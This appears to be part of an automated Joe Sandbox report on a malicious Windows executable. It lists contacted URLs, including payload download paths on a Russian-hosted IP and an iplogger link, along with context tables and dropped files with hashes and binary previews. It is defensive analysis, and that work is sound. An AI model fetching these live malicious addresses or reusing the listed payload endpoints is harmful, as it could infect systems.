                  http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                    		high
                    http://185.156.73.23/files/download5zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://iplogger.org/1Pz8p7zSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                        		high
                        https://g-cleanit.hkzSmMqGGeVy.exe, 00000000.00000003.2240803688.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2242386350.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239260994.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241126428.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239581973.00000000058F0000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239380506.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2239325591.0000000005710000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2240552425.000000000588F000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000003.2241006359.0000000005A51000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                          		high
                          http://185.156.73.23/dll/downloadWzSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005650000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.156.73.23
                            		unknownRussian Federation
                            		48817RELDAS-NETRUfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1578937
                            Start date and time:2024-12-20 16:52:38 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 9s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:12
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:zSmMqGGeVy.exe
                            renamed because original name is a hash value
                            Original Sample Name:83aa26bd8755e994141c4b6d525307ba.exe
                            Detection:MAL
                            Classification:mal100.evad.winEXE@2/15@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 40.81.94.65, 20.42.65.92, 13.107.246.63, 20.12.23.50, 40.126.53.18
                            • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, twc.trafficmanager.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: zSmMqGGeVy.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            10:54:14API Interceptor1456416x Sleep call for process: zSmMqGGeVy.exe modified
                            10:55:46API Interceptor1x Sleep call for process: WerFault.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.156.73.23tXEKP1ThBP.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            4kahanaK78.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download
                            BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23/soft/download

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            s-part-0035.t-0009.t-msedge.net2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            VajVW1leCd.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                            • 13.107.246.63
                            16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                            • 13.107.246.63
                            Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                            • 13.107.246.63
                            f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                            • 13.107.246.63
                            MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                            • 13.107.246.63
                            RZnZbS97dD.exeGet hashmaliciousLummaCBrowse
                            • 13.107.246.63
                            Invoice Shipment.bat.exeGet hashmaliciousDarkCloudBrowse
                            • 13.107.246.63

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            RELDAS-NETRUtXEKP1ThBP.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            4kahanaK78.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                            • 185.156.73.23
                            beacon.exeGet hashmaliciousCobaltStrikeBrowse
                            • 185.156.73.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]tXEKP1ThBP.exeGet hashmaliciousUnknownBrowse
                              hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                                7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                  dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                                    8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                      BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                          file.exeGet hashmaliciousUnknownBrowse
                                            file.exeGet hashmaliciousUnknownBrowse
                                              file.exeGet hashmaliciousUnknownBrowse

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zSmMqGGeVy.exe_d3732fc336953897b8edd5437d118980d49953d2_3d1fba4a_241539fc-784f-4e0b-8577-2c7160bbff85\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9865335553061164
                                                Encrypted:false
                                                SSDEEP:96:f2ZxWG9oMKbsvhN97YjSYQXIDcQoc6ScE5cw3yTJ+HbHg/8BRTf3Oy1oVazW0H9a:f4xVoMKbo0WWDLjudvszuiFAZ24IO8P
                                                MD5:F2EFC88C2F920CC8AE95262B5D1E5671
                                                SHA1:16E135D0A8D661CE9C276E6220391DBD695DCF71
                                                SHA-256:4F2E371968CEB477A9207AF2EADFAC45C9A61BCFE986E4DE3AF4FEF6E8E72A58
                                                SHA-512:23E1B2612BC1E4C6F202E7547181E6BD6A26B856271AF12C2757A59FE1D9A37DF4B921ABAEBBB8B05648D501F8341D187C2ECDB9420C098781079AB89786D3AE
                                                Malicious:true
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.3.7.1.5.4.1.8.3.7.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.3.7.1.6.6.5.2.7.4.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.1.5.3.9.f.c.-.7.8.4.f.-.4.e.0.b.-.8.5.7.7.-.2.c.7.1.6.0.b.b.f.f.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.2.8.e.2.3.3.-.0.6.3.6.-.4.2.f.1.-.b.9.8.7.-.d.d.6.0.1.8.8.5.8.e.b.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.S.m.M.q.G.G.e.V.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.4.-.0.0.0.1.-.0.0.1.4.-.5.2.0.b.-.d.a.5.7.f.7.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.b.b.a.4.c.3.b.f.f.a.8.6.6.f.e.e.e.a.4.1.0.8.b.3.f.3.1.7.f.f.6.0.0.0.0.f.f.f.f.!.0.0.0.0.1.c.c.2.4.8.5.5.2.0.8.4.0.2.4.7.0.1.0.c.d.5.a.2.a.6.f.6.b.a.6.9.9.2.4.a.8.d.a.5.!.z.S.m.M.q.G.G.e.V.y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB49.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 15:55:16 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):46496
                                                Entropy (8bit):2.5442778663649674
                                                Encrypted:false
                                                SSDEEP:192:f/G8M03XfmDHYXNyOioGpvTEAWdCFMzs/xG7syGtXK7YwSsGh2nUUs3d1gpFsqvk:T/mDHANPG5gAWdCrJjtDsJPkYdU
                                                MD5:5924CD1A6FED2B88BA8B061193711076
                                                SHA1:98C39D3E5A4542ACE63A3DC051945627CCE42CFF
                                                SHA-256:2E4BB1AB576EDC60D51D4F3DEBAD2A26C0A298CD81251343DFD6E802F91E642A
                                                SHA-512:D4D2D3622C77239A217DBA7B96F3A068A514C2EC651F142F38634535021850604E7C346781638716FDACB8E8D6168948D6433A0A5133F467B2AE01727A237B20
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... .......d.eg............4...........8...<.......D....,..........T.......8...........T...........(B..xs..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.............eg....?........................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE95.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8394
                                                Entropy (8bit):3.698559615617433
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJuA6cf6YN5SUbgmfyupDp89bEAsfRsm:R6lXJB686YTSUbgmfylETfP
                                                MD5:475AFA45DD2B6F210E7C9BEB051C9ABD
                                                SHA1:53E897CE298A919FB54817BDE2B5FC386008AFA8
                                                SHA-256:D6A46402F62923A2C2EE40A950E51564F97D11B67FFA0AC2B138E83AD4873050
                                                SHA-512:7A94B9C2441DF590256D1E09A39989E56ADEA4352C69A85E7B884949E9B4DB4784E48DFB103CB5220AA1F6485B70E9DBE0BCC942EE5F4FBF51977A380F1F468A
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF42.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4680
                                                Entropy (8bit):4.466902524607603
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsXJg77aI9B2WpW8VYqYm8M4JoRF2WwWsj+q8vVF1j2VvMzufd:uIjf5I7rX7V2JUsjKJj3zufd
                                                MD5:D1A63E218B4C2F679EE30A0E7AF739FB
                                                SHA1:4F5A3CB75E60910F83EFBAD51FA6DC884F10142B
                                                SHA-256:08FF3C4203671081E64C6B28D182095DEAABD75FDC34CD0047F51C47A1B42870
                                                SHA-512:76F28CA2A7CD519C3FCED6900B8E3EA1AC88D1504BBC5C65A12F86780951BC411DCB7A202269F872FEF57A6A860DF36F7F5CDD6E62F916D79FB53F6561DDB819
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639777" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):242176
                                                Entropy (8bit):6.47050397947197
                                                Encrypted:false
                                                SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: tXEKP1ThBP.exe, Detection: malicious, Browse
                                                • Filename: hvm4oOzDaX.exe, Detection: malicious, Browse
                                                • Filename: 7JKssbjRDa.exe, Detection: malicious, Browse
                                                • Filename: dI3n4LSHB7.exe, Detection: malicious, Browse
                                                • Filename: 8V0INSl0E2.exe, Detection: malicious, Browse
                                                • Filename: BEd2lJRXFM.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Reputation:high, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\download[1].htm

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:0

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\download[1].htm

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\fuckingdllENCR[1].dll

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):97296
                                                Entropy (8bit):7.9982317718947025
                                                Encrypted:true
                                                SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                Malicious:false
                                                Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\key[1].htm

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):21
                                                Entropy (8bit):3.880179922675737
                                                Encrypted:false
                                                SSDEEP:3:gFsR0GOWW:gyRhI
                                                MD5:408E94319D97609B8E768415873D5A14
                                                SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                Malicious:false
                                                Preview:9tKiK3bsYm4fMuK47Pk3s

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):1502720
                                                Entropy (8bit):7.646111739368707
                                                Encrypted:false
                                                SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 75%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Bunifu_UI_v1.5.3.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):242176
                                                Entropy (8bit):6.47050397947197
                                                Encrypted:false
                                                SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                MD5:2ECB51AB00C5F340380ECF849291DBCF
